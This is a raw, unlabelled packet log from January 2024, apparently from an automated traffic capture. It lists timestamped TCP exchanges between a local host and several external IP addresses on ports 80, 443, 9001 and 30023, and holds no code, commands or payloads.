                                                                                                                                                                    Jan 7, 2024 05:29:51.603243113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.603279114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.604471922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.604535103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.604579926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.604684114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.604813099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.604851007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.648550034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.648628950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.648756027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.648803949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.648840904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.648916960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.649183035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.649256945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.649271965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.649315119 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.788733959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.788800955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.788969040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.791604042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.791620016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.791661024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.792372942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.792458057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.792501926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.796055079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.796070099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.796138048 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.797857046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.797941923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.797995090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.798397064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.798446894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.798530102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.798579931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.798598051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.798645973 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.798713923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.798778057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.799330950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.799535036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.799726009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.799772024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.799781084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.799913883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.799956083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.842868090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.842886925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.842938900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.842952013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.842959881 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.843003988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.843372107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.843417883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.843439102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.843456984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.843466997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.843499899 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.866039038 CET44349744172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.866141081 CET44349744172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.866203070 CET49744443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:51.866401911 CET49744443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:51.866430044 CET44349744172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.905002117 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:51.905040979 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.905145884 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:51.908768892 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:51.908782959 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.983836889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.983884096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.983972073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.986466885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.986511946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.986582041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.987159014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.987245083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.987322092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.987401009 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.991620064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.991786003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.991811991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.993849993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.993931055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.993959904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994138002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994184017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.994431973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994518042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994564056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.994581938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994910002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.994955063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.994973898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.995021105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.995089054 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.995178938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.995259047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:51.995301962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:51.995332003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.014115095 CET4974730023192.168.2.4185.220.101.23
                                                                                                                                                                    Jan 7, 2024 05:29:52.037600994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.037650108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.037656069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.037689924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.037754059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.037784100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.038343906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.038388968 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.038413048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.038460970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.038510084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.038528919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.094049931 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.094116926 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.095391989 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.095401049 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.095659971 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.096833944 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.096940041 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.096945047 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.106693983 CET497439001192.168.2.478.46.174.72
                                                                                                                                                                    Jan 7, 2024 05:29:52.106740952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.177561045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.177659988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.177731991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.180435896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.180450916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.180496931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.180989027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.181062937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.181138992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.181166887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.181276083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.181328058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.185548067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.187891960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.187941074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.187968016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188041925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188086987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.188097954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188150883 CET3002349747185.220.101.23192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188375950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188420057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.188469887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188713074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188771963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.188862085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188901901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.188950062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.188971043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.189069033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.189115047 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.189165115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.231271029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.231344938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.231374979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.231417894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.231493950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.231626987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.232047081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.232099056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.232109070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.232507944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.233439922 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.301177979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.301306009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.301382065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.371501923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.371550083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.371635914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.374402046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.374490023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.374548912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.375261068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.375334978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.375438929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.375494003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.375509024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.375562906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.381741047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.381841898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.381892920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.381897926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.381983042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382208109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382258892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.382327080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382375956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.382414103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382499933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382615089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382666111 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.382683039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382723093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.382790089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.382879019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.385437965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.425127029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.425199032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.425259113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.425292969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.425339937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.425384045 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.426172018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.426342010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.426387072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.427615881 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.427710056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.429446936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.496543884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.496645927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.496727943 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.521784067 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.521909952 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.522083044 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.522303104 CET49746443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.522320032 CET44349746172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.536355972 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.536391973 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.536611080 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.537049055 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.537061930 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.565726995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.565799952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.565871954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.568810940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.568886042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.569545984 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.569762945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.569778919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.569828987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.569874048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.569966078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.573436975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.576155901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576242924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576355934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576410055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.576415062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576447964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576453924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.576565027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576641083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576689005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.576714039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576751947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.576780081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.576854944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.577431917 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.579401016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.579487085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.581443071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.619687080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.619851112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.619987965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.620012999 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.620095968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.620141029 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.620901108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.620919943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.621445894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.623455048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.623605013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.623646021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.691137075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.691294909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.691355944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.700452089 CET4974730023192.168.2.4185.220.101.23
                                                                                                                                                                    Jan 7, 2024 05:29:52.723432064 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.723512888 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.724693060 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.724704027 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.724967003 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.726457119 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.726583958 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:52.726589918 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.759900093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.759919882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.759984970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.763464928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.763545990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.763598919 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.763639927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.763760090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.763840914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.767074108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.767158031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.767219067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.770365000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.770457029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.770519018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.770558119 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.770637035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.770679951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.770721912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.770912886 CET804973591.215.85.120192.168.2.4
